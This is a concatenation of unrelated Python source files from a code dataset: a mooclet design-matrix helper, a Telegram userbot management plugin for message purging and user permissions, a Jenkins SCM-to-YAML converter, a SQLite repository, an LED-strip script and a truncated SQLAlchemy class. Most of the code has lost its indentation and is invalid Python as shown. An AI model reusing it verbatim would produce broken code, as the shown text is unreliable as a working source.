#choose the one with least assignment
#(where same value is ordered arbitrarily)
cond = cond_common_order[-1][0]
else:
#subject hasn't seen all versions yet
cond_choices = set(full_set) - set(previous_set)
# print "cond_choices"
# print cond_choices
cond = choice(list(cond_choices))
return cond
def create_design_matrix(input_df, formula, add_intercept = True):
'''
:param input_df:
    :param formula: for example "y ~ x0 + x1 + x2 + x0 * x1 + x1 * x2"
:param add_intercept: whether to add dummy columns of 1.
:return: the design matrix as a dataframe, each row corresponds to a data point, and each column is a regressor in regression
'''
D_df = pd.DataFrame()
input_df = input_df.astype(np.float64)
formula = str(formula)
# parse formula
formula = formula.strip()
all_vars_str = formula.split('~')[1].strip()
dependent_var = formula.split('~')[0].strip()
vars_list = all_vars_str.split('+')
    vars_list = [v.strip() for v in vars_list]
''''#sanity check to ensure each var used in
for var in vars_list:
if var not in input_df.columns:
raise Exception('variable {} not in the input dataframe'.format((var)))'''
# build design matrix
for var in vars_list:
if '*' in var:
interacting_vars = var.split('*')
            interacting_vars = [v.strip() for v in interacting_vars]
D_df[var] = input_df[interacting_vars[0]]
for i in range(1, len(interacting_vars)):
D_df[var] *= input_df[interacting_vars[i]]
else:
D_df[var] = input_df[var]
# add dummy column for bias
if add_intercept:
D_df.insert(0, 'Intercept', 1.)
return D_df
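# Illustrative example (added comment, not in the original module), using the formula format
# documented above:
#   demo = pd.DataFrame({"x0": [1., 2.], "x1": [3., 4.], "y": [0., 1.]})
#   create_design_matrix(demo, "y ~ x0 + x1 + x0 * x1")
# returns a frame with columns ['Intercept', 'x0', 'x1', 'x0 * x1'], where the interaction
# column is the elementwise product of x0 and x1.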
def values_to_df(mooclet, policyparams, latest_update=None):
"""
where variables is a list of variable names
note: as implemented this will left join on users which can result in NAs
"""
Value = apps.get_model('engine', 'Value')
variables = list(policyparams.parameters["contextual_variables"])
outcome = policyparams.parameters["outcome_variable"]
action_space = policyparams.parameters["action_space"]
variables.append(outcome)
if not latest_update:
values = Value.objects.filter(variable__name__in=variables, mooclet=mooclet) #mooclet=mooclet
else:
values = Value.objects.filter(variable__name__in=variables, timestamp__gte=latest_update, mooclet=mooclet)#.order_by('learner') #mooclet=mooclet
#TODO ONLY CARE ABOUT DATE ON OUTCOME
#outcomes = Value.objects.filter(variable__name=outcome, mooclet=mooclet, policy=policyparams.policy).order_by('learner')
#print("OUTCOMES")
#print(len(outcomes))
#values = values | outcomes
print("values")
print(len(values))
variables.append('user_id')
#variables.append(outcome)
variables.remove('version')
variables.extend(action_space.keys())
print("variables")
print(variables)
vals_to_df = pd.DataFrame({},columns=variables)
curr_user = None
curr_user_values = {}
#TODO: if the variable is "version" get the mapping to actions
for value in values:
#skip any values with no learners
if not value.learner:
continue
if curr_user is None:
curr_user = value.learner.id
curr_user_values = {'user_id': curr_user}
if value.learner.id != curr_user:
#append to df
try:
vals_to_df = vals_to_df.append(curr_user_values, ignore_index=True)
except ValueError:
print("duplicate data")
print(curr_user_values)
pass
curr_user = value.learner.id
curr_user_values = {'user_id': curr_user}
#transform mooclet version shown into dummified action
#todo silo off version as its own thing??? so that we always get most recent?
if value.variable.name == 'version':
action_config = policyparams.parameters['action_space']
#this is the numerical representation from the config
#IN THIS STEP ALSO GET AN OUTCOME RELATED TO THIS VERSION
for action in action_config:
action = action.encode('utf-8')
# print("current_version_json: ")
# print(value.version.version_json)
curr_action_config = value.version.version_json[action]
curr_user_values[action] = curr_action_config
#UNLESS IT IS AN OUTCOME IN WHICH CASE HANDLE AS ABOVE AND DISCARD
else:
curr_user_values[value.variable.name] = value.value
#print(curr_user_values)
else:
try:
vals_to_df = vals_to_df.append(curr_user_values, ignore_index=True)
except ValueError:
print("duplicate data")
print(curr_user_values)
pass
# print("values df: ")
# print(vals_to_df)
if not vals_to_df.empty:
output_df = vals_to_df.dropna()
else:
output_df = vals_to_df
# if vals_to_df :
# output_df = pd.concat(vals_to_df)
# output_df = output_df.dropna()
# #print output_df.head()
# else:
# output_df = pd.DataFrame()
print(output_df)
return output_df
|
StarcoderdataPython
|
3437439
|
import asyncio
import traceback
import time
import re
from pyrogram import filters
from bot import alemiBot
from util.permission import is_allowed, is_superuser, allow, disallow, serialize, list_allowed, ALLOWED
from util.user import get_username
from util.message import edit_or_reply, get_text, is_me
from util.text import split_for_window
from util.command import filterCommand
from util.time import parse_timedelta
from plugins.help import HelpCategory
import logging
logger = logging.getLogger(__name__)
HELP = HelpCategory("MANAGEMENT")
HELP.add_help("delme", "immediately delete message",
"add `-delme` at the end of a message to have it deleted after a time. " +
"If no time is given, message will be immediately deleted", args="[<time>]")
@alemiBot.on_message(filters.me & filters.regex(pattern=
r"(?:.*|)(?:-delme)(?: |)(?P<time>[0-9]+|)$"
), group=5)
async def deleteme(client, message):
logger.info("Deleting sent message")
t = message.matches[0]["time"]
if t != "":
await asyncio.sleep(float(t))
await message.delete()
async def get_user(arg, client):
if arg.isnumeric():
return await client.get_users(int(arg))
else:
return await client.get_users(arg)
HELP.add_help(["purge", "wipe", "clear"], "batch delete messages",
"delete messages last <n> messages (excluding this) sent by <targets> (can be a list of `@user`). If <n> is not given, will default to 1. " +
"If no target is given, messages from author of replied msg or self msgs will be deleted. You can give flag `-all` to delete from everyone. " +
"Search is limited to last 100 messages by default, add the `-full` flag to make an unbound (and maybe long, be careful!) search."
"A keyword (regex) can be specified (`-k`) so that only messages matching given pattern will be deleted. " +
"An offset can be specified with `-o`, to start deleting after a specific number of messages. " +
"A time frame can be given: you can limit deletion to messages before (`-before`) a certain time " +
"(all messages from now up to <time> ago), or after (`-after`) a certain interval (all messages older than <time>). " +
"Time can be given as a packed string like this : `8y3d4h15m3s` (years, days, hours, minutes, seconds), " +
"any individual token can be given in any position and all are optional, it can just be `30s` or `5m`. If " +
"you want to include spaces, wrap the 'time' string in `\"`. If you need to purge messages from an user without an @username, " +
"you can give its user id with the `-id` flag. If you need to provide more than 1 id, wrap them in `\"` and separate with a space.",
args="[-k <keyword>] [-o <n>] [-before <time>] [-after <time>] [-all] [-id <ids>] [<targets>] [<number>] [-full]", public=False)
@alemiBot.on_message(is_superuser & filterCommand(["purge", "wipe", "clear"], list(alemiBot.prefixes), options={
"keyword" : ["-k", "-keyword"],
"offset" : ["-o", "-offset"],
"ids" : ["-id"],
"before" : ["-before"],
"after" : ["-after"],
"limit" : ["-lim"]
}, flags=["-all", "-full"]))
async def purge(client, message):
args = message.command
target = []
opts = {}
number = 1
delete_all = "-all" in args["flags"]
keyword = re.compile(args["keyword"]) if "keyword" in args else None
offset = int(args["offset"]) if "offset" in args else 0
time_limit = time.time() - parse_timedelta(args["before"]).total_seconds() if \
"before" in args else None
hard_limit = "-full" not in args["flags"]
if "after" in args:
opts["offset_date"] = int(time.time() - parse_timedelta(args["after"]).total_seconds())
try:
if "cmd" in args:
for a in args["cmd"]:
if a.startswith("@"):
if a == "@me":
target.append(message.from_user.id)
else:
target.append((await get_user(a, client)).id)
elif a.isnumeric():
number = int(a)
if "ids" in args:
for single_id in args["ids"].split():
target.append(int(single_id))
if not target:
if message.reply_to_message:
target.append(message.reply_to_message.from_user.id)
else:
target.append(message.from_user.id)
logger.info(f"Purging last {number} message from {target}")
n = 0
total = 0
async for msg in client.iter_history(message.chat.id, **opts):
total += 1
if hard_limit and total > max(100, number):
break
if msg.message_id == message.message_id: # ignore message that triggered this
continue
if ((delete_all or msg.from_user.id in target)
and (not keyword or keyword.search(get_text(msg)))): # wait WTF why no raw here
if offset > 0: # do an offset like this because
offset -=1 # we want to offset messages from target user, not all messages
continue
await msg.delete()
n += 1
if n >= number:
break
if time_limit is not None and msg.date < time_limit:
break
await edit_or_reply(message, "` → ` Done")
except Exception as e:
traceback.print_exc()
await edit_or_reply(message, "`[!] → ` " + str(e))
await client.set_offline()
HELP.add_help(["merge"], "join multiple messages into one",
"join multiple messages sent by you into one. Reply to the first one to merge, bot will join " +
"every consecutive message you sent. You can stop the bot from deleting merged messages with " +
"`-nodel` flag. You can specify a separator with `-s`, it will default to `\n`. You can specify max " +
"number of messages to merge with `-max`.", args="[-s <sep>] [-max <n>] [-nodel]", public=False)
@alemiBot.on_message(is_superuser & filterCommand(["merge"], list(alemiBot.prefixes), options={
"separator" : ["-s"],
"max" : ["-max"]
}, flags=["-nodel"]))
async def merge_cmd(client, message):
if not message.reply_to_message:
return await edit_or_reply(message, "`[!] → ` No start message given")
m_id = message.reply_to_message.message_id
sep = message.command["separator"] if "separator" in message.command else "\n"
del_msg = "-nodel" not in message.command["flags"]
max_to_merge = message.command["max"] if "max" in message.command else -1
try:
logger.info(f"Merging messages")
out = ""
count = 0
async for msg in client.iter_history(message.chat.id, offset_id=m_id, reverse=True):
if msg.message_id == message.message_id or not is_me(msg) or msg.media \
or (max_to_merge > 0 and count >= max_to_merge):
break
out += msg.text.markdown + sep
count += 1
if del_msg and msg.message_id != m_id: # don't delete the one we want to merge into
await msg.delete()
await message.reply_to_message.edit(out)
await edit_or_reply(message, f"` → ` Merged {count} messages")
except Exception as e:
traceback.print_exc()
await edit_or_reply(message, "`[!] → ` " + str(e))
await client.set_offline()
HELP.add_help(["allow", "disallow", "revoke"], "allow/disallow to use bot",
"this command will work differently if invoked with `allow` or with `disallow`. Target user " +
"will be given/revoked access to public bot commands. ~~Use `@here` or `@everyone` to allow " +
"all users in this chat.", args="<target>")
@alemiBot.on_message(is_superuser & filterCommand(["allow", "disallow", "revoke"], list(alemiBot.prefixes)))
async def manage_allowed_cmd(client, message):
try:
users_to_manage = []
if message.reply_to_message is not None:
peer = message.reply_to_message.from_user
if peer is None:
return
users_to_manage.append(peer)
elif "cmd" in message.command:
if message.command["cmd"][0] in ["@here", "@everyone"]:
async for u in client.iter_chat_members(message.chat.id):
if u.user.is_bot:
continue
users_to_manage.append(u.user)
else:
user = None
try:
user = await client.get_users(message.command["cmd"][0])
except ValueError:
return await edit_or_reply(message, "`[!] → ` No user matched")
if user is None:
return await edit_or_reply(message, "`[!] → ` No user matched")
users_to_manage.append(user)
else:
return await edit_or_reply(message, "`[!] → ` Provide an ID or reply to a msg")
logger.info("Changing permissions")
out = ""
action_allow = message.command["base"] == "allow"
for u in users_to_manage:
u_name = get_username(u)
if action_allow:
if allow(u.id, val=u_name):
out += f"` → ` Allowed **{u_name}**\n"
else:
if disallow(u.id, val=u_name):
out += f"` → ` Disallowed **{u_name}**\n"
if out != "":
await edit_or_reply(message, out)
else:
await edit_or_reply(message, "` → ` No changes")
except Exception as e:
traceback.print_exc()
await edit_or_reply(message, f"`[!] → ` __{str(e)}__")
HELP.add_help(["trusted", "plist", "permlist"], "list allowed users",
"note that users without a username may give issues. Use `-s` to get " +
"the users individually if a batch request fails with 'InvalidPeerId'.", args="[-s]")
# broken af lmaooo TODO
@alemiBot.on_message(is_superuser & filterCommand(["trusted", "plist", "permlist"], list(alemiBot.prefixes), flags=["-s"]))
async def trusted_list(client, message):
try:
user_ids = list_allowed()
text = "`[` "
issues = ""
users = []
logger.info("Listing allowed users")
if "-s" in message.command["flags"]:
for uid in list_allowed():
try:
users.append(await client.get_users(uid))
except:
issues += f"~~[{uid}]~~ "
else:
users = await client.get_users([ int(u) for u in user_ids ]) # this thing gives a PeerIdInvalid exc???
for u in users:
text += f"{get_username(u)}, "
text += "`]`"
await edit_or_reply(message, f"` → Allowed Users : `\n{text}\n{issues}")
except Exception as e:
traceback.print_exc()
await edit_or_reply(message, f"`[!] → ` __{str(e)}__")
|
StarcoderdataPython
|
12820734
|
<reponame>javiergayala/jenkins-job-wrecker<filename>jenkins_job_wrecker/modules/scm.py
# encoding=utf8
import jenkins_job_wrecker.modules.base
class Scm(jenkins_job_wrecker.modules.base.Base):
component = 'scm'
def gen_yml(self, yml_parent, data):
scm = []
scm_class = None
if 'class' in data.attrib:
if data.attrib['class'] == 'hudson.scm.NullSCM':
return None
if data.attrib['class'] == 'org.jenkinsci.plugins.multiplescms.MultiSCM':
for scm in data[0]:
self.gen_yml(yml_parent, scm)
return
scm_class = data.attrib['class'].split('.')[-1].lower()
scm_tag = data.tag.split('.')[-1].lower()
if scm_tag in self.registry.registry[self.component]:
self.registry.dispatch(self.component, scm_tag, data, scm)
yml_parent.append(['scm', scm])
return
if scm_class is not None and scm_class in self.registry.registry[self.component]:
self.registry.dispatch(self.component, scm_class, data, scm)
yml_parent.append(['scm', scm])
return
raise NotImplementedError('%s scm not supported' % data.attrib['class'])
def gitscm(top, parent):
git = {}
for child in top:
if child.tag == 'configVersion':
continue # we don't care
elif child.tag == 'userRemoteConfigs':
if len(list(child)) != 1:
# expected "hudson.plugins.git.UserRemoteConfig" tag
raise NotImplementedError("%s not supported with %i "
"children" % (child.tag,
len(list(child))))
for setting in child[0]:
if setting.tag == 'credentialsId':
git['credentials-id'] = setting.text
else:
git[setting.tag] = setting.text
elif child.tag == 'gitTool':
git['git-tool'] = child.text
elif child.tag == 'excludedUsers':
if child.text:
users = child.text.split()
git['excluded-users'] = users
elif child.tag == 'buildChooser':
if child.attrib['class'] == \
'hudson.plugins.git.util.DefaultBuildChooser':
continue
else:
# see JJB's jenkins_jobs/modules/scm.py
# for other build choosers
raise NotImplementedError("%s build "
"chooser" % child.attrib['class'])
elif child.tag == 'disableSubmodules':
            # 'false' is the default and needs no explicit YAML.
if child.text == 'true':
raise NotImplementedError("TODO: %s" % child.tag)
elif child.tag == 'recursiveSubmodules':
            # 'false' is the default and needs no explicit YAML.
if child.text == 'true':
raise NotImplementedError("TODO: %s" % child.tag)
elif child.tag == 'authorOrCommitter':
            # 'false' is the default and needs no explicit YAML.
if child.text == 'true':
git['use-author'] = True
elif child.tag == 'useShallowClone':
            # 'false' is the default and needs no explicit YAML.
if child.text == 'true':
git['shallow-clone'] = True
elif child.tag == 'ignoreNotifyCommit':
            # 'false' is the default and needs no explicit YAML.
if child.text == 'true':
git['ignore-notify'] = True
elif child.tag == 'wipeOutWorkspace':
git['wipe-workspace'] = (child.text == 'true')
elif child.tag == 'skipTag':
            # 'false' is the default and needs no explicit YAML.
if child.text == 'true':
git['skip-tag'] = True
elif child.tag == 'pruneBranches':
            # 'false' is the default and needs no explicit YAML.
if child.text == 'true':
git['prune'] = True
elif child.tag == 'remotePoll':
            # 'false' is the default and needs no explicit YAML.
if child.text == 'true':
git['fastpoll'] = True
elif child.tag == 'relativeTargetDir':
# If it's empty, no explicit 'basedir' YAML needed.
if child.text:
git['basedir'] = child.text
elif child.tag == 'reference':
# If it's empty, we're good
if child.text or len(list(child)) > 0:
raise NotImplementedError(child.tag)
elif child.tag == 'gitConfigName':
# If it's empty, we're good
if child.text or len(list(child)) > 0:
raise NotImplementedError(child.tag)
elif child.tag == 'gitConfigEmail':
# If it's empty, we're good
if child.text or len(list(child)) > 0:
raise NotImplementedError(child.tag)
elif child.tag == 'scmName':
# If it's empty, we're good
if child.text or len(list(child)) > 0:
raise NotImplementedError(child.tag)
elif child.tag == 'branches':
if child[0][0].tag != 'name':
raise NotImplementedError("%s XML not supported"
% child[0][0].tag)
branches = []
for item in child:
for branch in item:
branches.append(branch.text)
git['branches'] = branches
elif child.tag == 'doGenerateSubmoduleConfigurations':
if len(list(child)) != 0:
raise NotImplementedError("%s not supported with %i children"
% (child.tag, len(list(child))))
# JJB doesn't handle this element anyway. Just continue on.
continue
elif child.tag == 'submoduleCfg':
if len(list(child)) > 0:
raise NotImplementedError("%s not supported with %i children"
% (child.tag, len(list(child))))
elif child.tag == 'browser':
# XXX: blunt hammer: just use the "auto" browser for everything.
git['browser'] = 'auto'
elif child.tag == 'extensions':
for extension in child:
# hudson.plugins.git.extensions.impl.RelativeTargetDirectory
if extension.tag == 'hudson.plugins.git.extensions.impl.RelativeTargetDirectory':
if len(list(extension)) != 1:
# expected <relativeTargetDir>
raise NotImplementedError("%s not supported with %i children" % (extension.tag, len(list(extension))))
if extension[0].tag != 'relativeTargetDir':
raise NotImplementedError("%s XML not supported" % extension[0].tag)
git['basedir'] = extension[0].text
elif extension.tag == 'hudson.plugins.git.extensions.impl.CheckoutOption':
if len(list(extension)) != 1:
# expected <timeout>
raise NotImplementedError("%s not supported with %i children" % (extension.tag, len(list(extension))))
if extension[0].tag != 'timeout':
raise NotImplementedError("%s XML not supported" % child[0][0].tag)
git['timeout'] = extension[0].text
elif extension.tag == 'hudson.plugins.git.extensions.impl.WipeWorkspace':
if len(list(extension)) != 0:
raise NotImplementedError("%s not supported with %i children" % (extension.tag, len(list(extension))))
git['wipe-workspace'] = True
elif extension.tag == 'hudson.plugins.git.extensions.impl.LocalBranch':
git['local-branch'] = extension[0].text
elif extension.tag == 'hudson.plugins.git.extensions.impl.PerBuildTag':
pass
elif extension.tag == 'hudson.plugins.git.extensions.impl.CleanBeforeCheckout':
clean_dict = {'before': True}
if 'clean' in git: # after has already been added
git['clean'].update(clean_dict)
else: # Need to create dict for git['clean']
git['clean'] = clean_dict
elif extension.tag == 'hudson.plugins.git.extensions.impl.CleanCheckout':
clean_dict = {'after': True}
if 'clean' in git: # before has already been added
git['clean'].update(clean_dict)
else: # Need to create dict for git['clean']
git['clean'] = clean_dict
elif extension.tag == 'hudson.plugins.git.extensions.impl.PathRestriction':
paths = {'includedRegions': 'included-regions',
'excludedRegions': 'excluded-regions'}
for jxml, jjb in list(paths.items()):
if extension.find(jxml) is not None:
regions = extension.find(jxml).text
if regions is not None:
git[jjb] = regions.splitlines()
else:
raise NotImplementedError("%s not supported" % extension.tag)
else:
raise NotImplementedError("cannot handle XML %s" % child.tag)
parent.append({'git': git})
def mercurialscm(top, parent):
hg = {}
for child in top:
if child.tag == 'source':
hg['url'] = child.text
elif child.tag == 'credentialsId':
hg['credentials-id'] = child.text
elif child.tag == 'revisionType':
hg['revision-type'] = child.text.lower()
elif child.tag == 'revision':
hg['revision'] = child.text
elif child.tag == 'modules':
pass
elif child.tag == 'clean':
hg['clean'] = (child.text == 'true')
elif child.tag == 'subdir':
hg['subdir'] = child.text
elif child.tag == 'disableChangeLog':
hg['disable-changelog'] = (child.text == 'true')
elif child.tag == 'browser' and 'class' in child.attrib:
browser_class = child.attrib['class']
if browser_class == 'hudson.plugins.mercurial.browser.BitBucket':
hg['browser'] = 'bitbucketweb'
elif browser_class == 'hudson.plugins.mercurial.browser.FishEye':
hg['browser'] = 'fisheye'
elif browser_class == 'hudson.plugins.mercurial.browser.GoogleCode':
hg['browser'] = 'googlecode'
elif browser_class == 'hudson.plugins.mercurial.browser.HgWeb':
hg['browser'] = 'hgweb'
elif browser_class == 'hudson.plugins.mercurial.browser.Kallithea':
# Not supported by JJB
raise NotImplementedError("%s is not yet supported by jenkins-job-builder." %
browser_class)
elif browser_class == 'hudson.plugins.mercurial.browser.KilnHG':
hg['browser'] = 'kilnhg'
elif browser_class == 'hudson.plugins.mercurial.browser.RhodeCode':
hg['browser'] = 'rhodecode'
elif browser_class == 'hudson.plugins.mercurial.browser.RhodeCodeLegacy':
hg['browser'] = 'rhodecode-pre-1.2'
if child.find('url') is not None:
hg['browser-url'] = child.find('url').text
parent.append({'hg': hg})
def subversionscm(top, parent):
# Parameters:
# url (str) - URL of the svn repository
# basedir (str) - location relative to the workspace root to checkout to (default '.')
# credentials-id (str) - optional argument to specify the ID of credentials to use
# repo-depth (str) - Repository depth. Can be one of 'infinity', 'empty',
# 'files', 'immediates' or 'unknown'. (default 'infinity')
# ignore-externals (bool) - Ignore Externals. (default false)
# workspaceupdater (str) - optional argument to specify
# workspaceupdater -
# optional argument to specify how to update the workspace (default wipeworkspace)
# supported values:
# wipeworkspace - deletes the workspace before checking out
# revertupdate - do an svn revert then an svn update
# emulateclean - delete unversioned/ignored files then update
# update - do an svn update as much as possible
    # excluded-users (list(str)) - list of users to ignore revisions from when polling for changes (if polling is enabled)
# included-regions (list(str)) - list of file/folders to include (optional)
# excluded-regions (list(str)) - list of file/folders to exclude (optional)
# excluded-commit-messages (list(str)) - list of commit messages to exclude (optional)
# exclusion-revprop-name (str) - revision svn-property to ignore (optional)
# ignore-property-changes-on-directories (bool) - ignore svn-property only changes of directories (default false)
    # filter-changelog (bool) - If set Jenkins will apply the same inclusion and exclusion patterns for displaying changelog entries
# repos (list) - list of repositories to checkout (optional)
# viewvc-url (str) -
# URL of the svn web interface (optional)
# Repo:
# url (str) - URL for the repository
# basedir (str) - Location relative to the workspace root to checkout to (default '.')
# credentials-id - optional ID of credentials to use
    # repo-depth - Repository depth. Can be one of 'infinity', 'empty', 'files', 'immediates' or 'unknown'. (default 'infinity')
# ignore-externals - Ignore Externals. (default false)
svn = {}
for child in top:
if child.tag == 'remote':
svn['url'] = child.text if child.text else ''
elif child.tag == 'local':
svn['basedir'] = child.text if child.text else ''
elif child.tag == 'credentialsId':
svn['credentials-id'] = child.text if child.text else ''
elif child.tag == 'depthOption':
svn['repo-depth'] = child.text if child.text else ''
elif child.tag == 'ignoreExternalsOption':
svn['ignore-externals'] = (child.text == 'true')
elif child.tag == 'workspaceUpdater':
# see
# https://github.com/openstack-infra/jenkins-job-builder/blob/master/jenkins_jobs/modules/scm.py#L835
if child.attrib['class'] == 'hudson.scm.subversion.CheckoutUpdater':
svn['workspaceupdater'] = 'wipeworkspace'
elif child.attrib['class'] == 'hudson.scm.subversion.UpdateWithRevertUpdater':
svn['workspaceupdater'] = 'revertupdate'
elif child.attrib['class'] == 'hudson.scm.subversion.UpdateWithCleanUpdater':
svn['workspaceupdater'] = 'emulateclean'
elif child.attrib['class'] == 'hudson.scm.subversion.UpdateUpdater':
svn['workspaceupdater'] = 'update'
elif child.tag == 'includedRegions':
svn['included-regions'] = child.text if child.text else ''
elif child.tag == 'excludedRegions':
svn['excluded-regions'] = child.text if child.text else ''
elif child.tag == 'excludedUsers':
svn['excluded-users'] = child.text if child.text else ''
elif child.tag == 'excludedCommitMessages':
svn['excluded-commit-messages'] = child.text if child.text else ''
elif child.tag == 'excludedRevprop':
svn['exclusion-revprop-name'] = child.text if child.text else ''
elif child.tag == 'ignoreDirPropChanges':
svn['ignore-property-changes-on-directories'] = \
(child.text == 'true')
elif child.tag == 'filterChangelog':
svn['filter-changelog'] = (child.text == 'true')
elif child.tag == 'locations':
if len(list(child)) > 0:
repos = []
for c in child.getchildren():
repo = {}
for r in c:
if r.tag == 'remote':
repo['url'] = r.text if r.text else ''
elif r.tag == 'local':
repo['basedir'] = r.text if r.text else ''
elif r.tag == 'credentialsId':
repo['credentials-id'] = r.text if r.text else ''
elif r.tag == 'depthOption':
repo['repo-depth'] = r.text if r.text else ''
elif r.tag == 'ignoreExternalsOption':
repo['ignore-externals'] = (r.text == 'true')
repos.append(repo)
svn['repos'] = repos
else:
raise NotImplementedError("%s not supported tag in svn scm" % child.tag)
parent.append({'svn': svn})
|
StarcoderdataPython
|
245281
|
<filename>src/fbsrankings/infrastructure/sqlite/write/record.py<gh_stars>0
import sqlite3
from typing import List
from typing import Optional
from typing import Tuple
from typing import Union
from uuid import UUID
from pypika import Parameter
from pypika import Query
from pypika.queries import QueryBuilder
from fbsrankings.common import EventBus
from fbsrankings.domain import SeasonID
from fbsrankings.domain import TeamID
from fbsrankings.domain import TeamRecord
from fbsrankings.domain import TeamRecordID
from fbsrankings.domain import TeamRecordRepository as BaseRepository
from fbsrankings.domain import TeamRecordValue
from fbsrankings.event import TeamRecordCalculatedEvent
from fbsrankings.infrastructure.sqlite.storage import TeamRecordTable
from fbsrankings.infrastructure.sqlite.storage import TeamRecordValueTable
SqliteParam = Union[None, int, float, str, bytes]
class TeamRecordRepository(BaseRepository):
def __init__(
self, connection: sqlite3.Connection, cursor: sqlite3.Cursor, bus: EventBus,
) -> None:
super().__init__(bus)
self._connection = connection
self._cursor = cursor
self._record_table = TeamRecordTable().table
self._value_table = TeamRecordValueTable().table
bus.register_handler(TeamRecordCalculatedEvent, self._handle_record_calculated)
def get(self, id_: TeamRecordID) -> Optional[TeamRecord]:
cursor = self._connection.cursor()
cursor.execute(
self._query().where(self._record_table.UUID == Parameter("?")).get_sql(),
[str(id_.value)],
)
row = cursor.fetchone()
cursor.close()
return self._to_record(row) if row is not None else None
def find(self, season_id: SeasonID, week: Optional[int]) -> Optional[TeamRecord]:
query = self._query().where(self._record_table.SeasonID == Parameter("?"))
params: List[SqliteParam] = [str(season_id.value)]
if week is not None:
query = query.where(self._record_table.Week == Parameter("?"))
params.append(week)
else:
query = query.where(self._record_table.Week.isnull())
cursor = self._connection.cursor()
cursor.execute(
query.get_sql(), params,
)
row = cursor.fetchone()
cursor.close()
return self._to_record(row) if row is not None else None
def _query(self) -> QueryBuilder:
return Query.from_(self._record_table).select(
self._record_table.UUID,
self._record_table.SeasonID,
self._record_table.Week,
)
def _to_record(self, row: Tuple[str, str, Optional[int]]) -> TeamRecord:
cursor = self._connection.cursor()
cursor.execute(
Query.from_(self._value_table)
.select(
self._value_table.TeamRecordID,
self._value_table.TeamID,
self._value_table.Wins,
self._value_table.Losses,
)
.where(self._value_table.TeamRecordID == Parameter("?"))
.get_sql(),
[row[0]],
)
rows = cursor.fetchall()
cursor.close()
values = [self._to_value(row) for row in rows if row is not None]
return TeamRecord(
self._bus,
TeamRecordID(UUID(row[0])),
SeasonID(UUID(row[1])),
row[2],
values,
)
@staticmethod
def _to_value(row: Tuple[str, str, int, int]) -> TeamRecordValue:
return TeamRecordValue(TeamID(UUID(row[1])), row[2], row[3])
def _handle_record_calculated(self, event: TeamRecordCalculatedEvent) -> None:
query = (
Query.from_(self._record_table)
.select(self._record_table.UUID)
.where(self._record_table.SeasonID == Parameter("?"))
)
params: List[SqliteParam] = [str(event.season_id)]
if event.week is not None:
query = query.where(self._record_table.Week == Parameter("?"))
params.append(event.week)
else:
query = query.where(self._record_table.Week.isnull())
self._cursor.execute(
query.get_sql(), params,
)
row = self._cursor.fetchone()
if row is not None:
self._cursor.execute(
Query.from_(self._value_table)
.delete()
.where(self._value_table.TeamRecordID == Parameter("?"))
.get_sql(),
[row[0]],
)
self._cursor.execute(
Query.from_(self._record_table)
.delete()
.where(self._record_table.UUID == Parameter("?"))
.get_sql(),
[row[0]],
)
self._cursor.execute(
Query.into(self._record_table)
.columns(
self._record_table.UUID,
self._record_table.SeasonID,
self._record_table.Week,
)
.insert(Parameter("?"), Parameter("?"), Parameter("?"))
.get_sql(),
[str(event.id_), str(event.season_id), event.week],
)
insert_sql = (
Query.into(self._value_table)
.columns(
self._value_table.TeamRecordID,
self._value_table.TeamID,
self._value_table.Wins,
self._value_table.Losses,
)
.insert(Parameter("?"), Parameter("?"), Parameter("?"), Parameter("?"))
.get_sql()
)
for value in event.values:
self._cursor.execute(
insert_sql,
[str(event.id_), str(value.team_id), value.wins, value.losses],
)
|
StarcoderdataPython
|
9666115
|
def resolve():
'''
code here
'''
X = int(input())
X = X//100
if X < 6:
res = 8
elif X < 8:
res = 7
elif X < 10:
res = 6
elif X < 12:
res = 5
elif X < 14:
res = 4
elif X < 16:
res = 3
elif X < 18:
res = 2
else:
res = 1
print(res)
if __name__ == "__main__":
resolve()
|
StarcoderdataPython
|
3577475
|
<filename>python/led_fun.py
# Simple test for NeoPixels on Raspberry Pi
import time
import board
import neopixel
# Choose an open pin connected to the Data In of the NeoPixel strip, i.e. board.D18
# NeoPixels must be connected to D10, D12, D18 or D21 to work.
pixel_pin = board.D18
# The number of NeoPixels
num_pixels = 316
# The order of the pixel colors - RGB or GRB. Some NeoPixels have red and green reversed!
# For RGBW NeoPixels, simply change the ORDER to RGBW or GRBW.
ORDER = neopixel.RGB
pixels = neopixel.NeoPixel(
pixel_pin, num_pixels, brightness=0.2, auto_write=False #, pixel_order=ORDER
)
steps = 16
# r = range of pixels to iterate over
# c = color to set the pixels
def sequence(r, c):
for i in r:
#pixels[i] = c
# set the next *steps* pixels too
for j in range(steps):
if(i+j < num_pixels and i+j >= 0):
pixels[i+j] = c
pixels.write()
#time.sleep(.1)
#sequence(range(0, num_pixels, steps), (255, 0, 0))
#sequence(range(num_pixels, -1, -steps), (0, 255, 0))
#sequence(range(0, num_pixels, steps), (0, 0, 255))
#sequence(range(num_pixels, -1, -steps), (255, 255, 255))
#sequence(range(0, num_pixels, steps), (0, 0, 0))
while True:
sequence(range(60, num_pixels, steps), (255, 0, 0))
sequence(range(num_pixels, 60, -steps), (0, 255, 0))
sequence(range(60, num_pixels, steps), (0, 0, 255))
sequence(range(num_pixels, 60, -steps), (255, 255, 255))
sequence(range(60, num_pixels, steps), (0, 0, 0))
sequence(range(num_pixels, 60, -steps), (200, 10, 20))
|
StarcoderdataPython
|
8015409
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright © 2013 OnlineGroups.net and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
from datetime import datetime
from operator import and_
from pytz import UTC
import sqlalchemy as sa
from zope.sqlalchemy import mark_changed
from gs.database import getTable, getSession
class RequestQuery(object):
def __init__(self):
self.requestTable = getTable('user_group_member_request')
def add_request(self, requestId, userId, message, siteId, groupId):
now = datetime.now(UTC)
i = self.requestTable.insert()
d = {"request_id": requestId, "user_id": userId,
"message": message, "site_id": siteId,
"group_id": groupId, "request_date": now}
session = getSession()
session.execute(i, params=d)
mark_changed(session)
def decline_request(self, userId, groupId, adminId):
self.update_request(userId, groupId, adminId, False)
def accept_request(self, userId, groupId, adminId):
self.update_request(userId, groupId, adminId, True)
def update_request(self, userId, groupId, adminId, response):
u = self.requestTable.update(and_(and_(
self.requestTable.c.user_id == userId,
